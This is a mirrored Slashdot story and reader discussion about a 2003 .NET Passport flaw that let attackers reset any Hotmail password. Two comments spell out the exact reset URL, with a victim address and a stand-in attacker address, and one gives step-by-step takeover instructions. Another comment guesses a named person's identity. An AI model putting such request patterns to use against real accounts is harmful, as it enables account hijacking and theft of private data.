Slashdot Mirror

← Back to Stories (view on slashdot.org)

Security Vulnerability in Microsoft .NET Passport

Posted by michael on from the doh dept.

Stuart Moore writes "A vulnerability was reported in Microsoft .NET Passport, also affecting Hotmail user accounts. The simple flaw allows an attacker to change any person's password to an arbitrary value. The attacker can then gain access to the victim's accounts, as well as to the victim's personal information (if any is stored w/ Passport). Muhammad Faisal Rauf Danka posted a note to the Full-Disclosure security e-mail list after multiple unsuccessful attempts to contact Microsoft." There's a news report as well.

8 of 433 comments (clear)

  1. Re:Remember... by Anonymous Coward · · Score: 5, Informative

    according to a dutch news site this hole was fixed shortly after the posting... So thats the way to talk to microsoft.....

    nu.nl for people knowing how to read dutch (no NOT german)..

  2. Re:Remember... by m00nun1t · · Score: 4, Informative

    I fully agree this passport problem is a lame & unexcusable fault that should never, ever have happened.

    However, can you please stop dragging trustworthy computing into this? Bill Gates has said many times that the increased focus on security is for new products, not retrospectively fixing existing products.

    The only product that is really valid to criticise under the trustworthy computing tag is Windows Server 2003 - if that has big problems, then trustworthy computing has failed. But don't drag up old products/services.

    --
    Read reviews of shopping cart software
  3. MS-Passport and those that cannot/willnot read by SgtChaireBourne · · Score: 5, Informative
    MS-Passport has long been known to be impossible to secure, even in theory: See Risks of the Passport Single Signon Protocol. Even the FTC charged Microsoft with deceptive advertising in regards to MS-Passport. Other governments are not getting caught with their mouth open either. Standards body forced Redmond to pull 'unsubstantiated and misleading' advertisement

    There really does seem to be no difference between someone who cannot read and someone who does not. Those that can read wouldn't be caught using MS-Passport. Sadly, signal can be drowned out by noise coming from a colossal marketing blitz to last through september.

    We'll see if they last that long. Windows2003 seems to be more of a push to get users over to OS X or Linux. Their other (2nd of 2) cash cow, the new MS-Office has already been postponed and seems to be more of an incentive to move to OpenOffice than to upgrade.

    --
    Beta is broken and the link to classic doesn't work. Stop wasting our time or there won't be anybody left here.
  4. This is not new by johnatjohnytech · · Score: 5, Informative

    This is not a new thing, this has been around for a while.

    It is about time somebody tried to bring this to light. But i really doubt he "discovered" something that has been known about for a while.

    Don't believe me? Do a search on kazaa for hotmail passwords. You will find several txt/doc's with these or similiar instructions.

    --
    I Encrypt My IM's
  5. What breed of idiot are you? by gazbo · · Score: 5, Informative
    So it isn't a standard IIS 404. That is wrong how? Let me put it another way:
    lynx -head -source --mime-header 'https://register.passport.net/emailpwdreset.srf?l c=1033&em=victim@hotmail.com&id=&cb=&prefem=attack er@attacker.com&rst=1'

    HTTP/1.1 404 Not Found
    Server: Microsoft-IIS/5.0
    Date: Thu, 08 May 2003 13:10:14 GMT
    PPServer: H: LAWPPREGU4A002
    It's a 404. It returns a 404 code. It says it's a 404 on the page. Just because you understand so little of the HTTP protocol to think that 404 means "displays apache logo" doesn't make MS wrong.
  6. Re:thoughts by Kredal · · Score: 5, Informative

    since it's been 404'd, I'll provide it here.

    If you went to:

    https://register.passport.net/emailpwdreset.srf? lc =1033&em=victim@hotmail.com&id=&cb=&prefem=attacke r@attacker.com&rst=1

    and replaced the victim address to a real user, and the attacker@attacker.com to your address, they would send you an email telling you to click on another link, and you could set your own password. Wala, you now have rights to that hotmail account so you can read their mail, look at their buddy list, safely spam people, buy stuff (if they have their credit card saved), etc etc etc... Real fun stuff.

    --
    Whoever stated that signature sizes should be limited to one hundred and twenty characters can just go ahead and kiss my
  7. his name is probably by abhisarda · · Score: 4, Informative

    Robert Babcock.

    Do a search for Ashyukun on google.(www.nhmk.com/nes/ )

    also at

    (http://216.239.33.104/search?q=cache:q1XY1gcmAY AC :www.animemusicvideos.org/members/linkprobview.php %3Fdownload_id%3D1442+Robert+Babcock+ashyukun&hl=e n&ie=UTF-8).

    Consider yourself lucky you don't have to deal with hotmail. Hmm.. what do guys with names like Dick Cheney do?

  8. Re:Remember... by Reziac · · Score: 3, Informative

    Not fixed -- per the articles (which, sadly, I did read) they just shut down the function that allows users to change their password.

    --
    ~REZ~ #43301. Who'd fake being me anyway?